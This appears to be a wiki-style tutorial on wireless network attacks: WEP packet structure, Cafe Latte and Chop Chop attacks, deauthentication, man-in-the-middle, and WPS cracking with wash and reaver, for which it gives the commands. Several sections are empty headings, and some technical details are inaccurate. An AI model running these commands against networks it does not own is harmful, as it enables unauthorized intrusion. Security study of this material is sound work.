WEP can have multiple keys, however, this does not make the point more secure.

WEP works by encrypting the password with an RC4 symmetrical key.

The frame body of the packet contains an initialization vector or IV, the encrypted data, and an integrity check value or ICV which is an encrypted checksum. The IV is 3 bytes and ICV is 4 bytes in length.

IVs are generated randomly and prepended to the packet. IVs work as a cryptographic salt and are also used in packet generation. During packet generation, the IV is prepended to the WEP key, then encrypted using the RC4 algorithm.

The RC4 algorithm is made up of two processes, a Key Sharing Algorithm (KSA) and a Psuedo-Random Generation Algorithm (PRGA).

Next an ICV is formed on the data, allowing it to be checked for integrity. The data is prepended to the ICV. This concatenated data is then XORed with the RC4 encrypted IV/WEP key combo. Afterwards, the IV is again prepended to the encrypted data.

The finalized packet looks like this.

Not Encypted	Encypted
IV (3 bytes)	Data	ICV (4 bytes)

WEP Cracking

Cafe Latte

Cafe Latte is an attack that was mainly performed in coffee shops but, can be performed anywhere there is a computer attempting to reach a wireless network that is no longer in range. The attack involves a computer broadcasting that it is looking for a specific network. An attacker can pretend to be this network get the access point to give up the wireless password.

ARP Replay

Korek's Chop Chop Attack

Korek's Chop Chop Attack was an attack that allows the decryption of packets due to a flaw in packet validation on the AP's part.

The attack works by first obtaining an encrypted packet. The packet is split up into 3 parts, the IV, the encrypted data, and the ICV. The attacker then chops off the last byte and, sets the byte to 00. It then recalculates the ICV using a special method Korek invented.

Once the ICV is recalculated, it is sent back to the AP. If the byte was right, the AP will say it is correct, if it is not, the AP will tell the attacker the packet was wrong. The attacker then increments the 00 byte and, resubmits. It does this until it gets a correct response. It then moves to the next byte, doing the procedure over and over until it has fully decrypted the packet.

The attack manages to guess each byte within 128 tries, since the max it can go is 256. This attack can eventually yield a password, if done correctly.

Hirte Attack

Fragmentation Attack

WPA

WPA Cracking

WPA2

WPA2 Cracking

WPS

WPS (Wi-Fi Protected Setup) is a security feature common to most routers that comes in two varieties the PIN and button. WPS works to allow easy sharing of WPA/WPA2 passwords with a client who needs a connection. For the PIN version, the network administrator can give a WPS PIN to a client to allow them to connect. The button version sends the PIN to any client who connects when the WPS button is pressed on the router.

WPS Cracking

WPS cracking involves using two tools, wash and reaver to find vulnerable networks and bruteforce the PIN.

Wash

Wash is a tool to find WPS vulnerable access points. First, ensure your card is in monitor mode (See: airmon-ng) then, use the following command to begin scanning for vulnerable networks.

• wash -i [interface]

Wash will then find all vulnerable access points and display them. Access points that have WPS Locked set to no are vulnerable to attack, while a yes in that same column denotes it is invulnerable to attack.

Reaver

Reaver is a tool that can be used to brute-force an access points WPS PIN.

• reaver -i [interface] -b [bssid] -vv

Reaver will save your session if you decide to leave/stop an attack, and will resume when the command is run again.

DoS Attacks

Deauthentication Attacks

This attack involves sending massive amounts of deauth frames to a computer (or all computers) connected to an access point. By faking the MAC address of the access point the victim believes the request is legitimate.

Man In The Middle

The wireless man in the middle attack abuses computer trust for wireless access points. The attack revolves around the fact that a computer will auto-connect to an access point that is the closest signal and if it is already known.